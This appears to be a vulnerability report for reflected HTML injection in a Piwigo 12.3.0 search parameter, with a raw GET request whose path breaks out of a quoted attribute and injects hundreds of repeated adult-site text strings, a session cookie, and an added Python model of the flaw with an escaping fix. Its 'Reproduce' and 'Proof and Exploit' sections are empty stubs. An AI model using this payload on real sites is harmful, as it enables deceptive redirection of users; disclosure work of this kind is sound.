12.3.0

Description:

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute that is enclosed in double quotation marks. An attacker can trick a user into visiting a crafted URL that points to this system. Depending on the scenario, the attacker can then trick the user into visiting a malicious address that the victim will believe is associated with the original web address. This can be dangerous for all users of this system.

Status: Highly Vulnerable

[+] Payloads:

GET /piwigo/index.php?/search/4863/created-monthly-list%22%3Ehttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotco
mhttps:\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned_host.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg_id=hctfqtab45adhogo2suhq2mr0c; ssc_phoneSwap=0
Upgrade-Insecure-Requests: 1
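
The reflection described above, modelled as an added example (this is not Piwigo's code and not part of the original report): a value copied raw into a double-quoted attribute is compared with the same value after attribute-context escaping, and an HTML parser confirms whether the markup structure survived. The template, the function names and the shortened sample path are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: same shape as the request above, with the repeated text shortened.
SAMPLE_PATH = "/search/4863/created-monthly-list%22%3Einjected-text%3CYZxWX%3E"
TEMPLATE = '<a class="nav" href="index.php?%s">list</a>'  # hypothetical template

def render_unsafe(value):
    """Model of the flaw: the value is copied as-is into a double-quoted attribute."""
    return TEMPLATE % value

def render_safe(value):
    """Fix: encode for the attribute context, so '"', '<', '>' and '&' become entities."""
    return TEMPLATE % escape(value, quote=True)

class Audit(HTMLParser):
    """Records every start tag, href value and text node the parser actually sees."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.hrefs, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs += [v for k, v in attrs if k == "href"]

    def handle_data(self, data):
        self.text.append(data)

def audit(markup):
    parser = Audit()
    parser.feed(markup)
    parser.close()
    return parser

def breaks_out(render, raw_path):
    """True if the reflected value escaped its attribute and altered the page structure."""
    value = unquote(raw_path)  # the server sees the URL-decoded value
    seen = audit(render(value))
    intact = (seen.tags == ["a"]
              and seen.hrefs == ["index.php?" + value]
              and "".join(seen.text) == "list")
    return not intact

if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        print(render.__name__, "breaks out:", breaks_out(render, SAMPLE_PATH))
```

In PHP, the equivalent encoding for a double-quoted attribute is htmlspecialchars() with ENT_QUOTES.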

Reflected Out:

PoC

      • Link

Reproduce:

href

Proof and Exploit:

href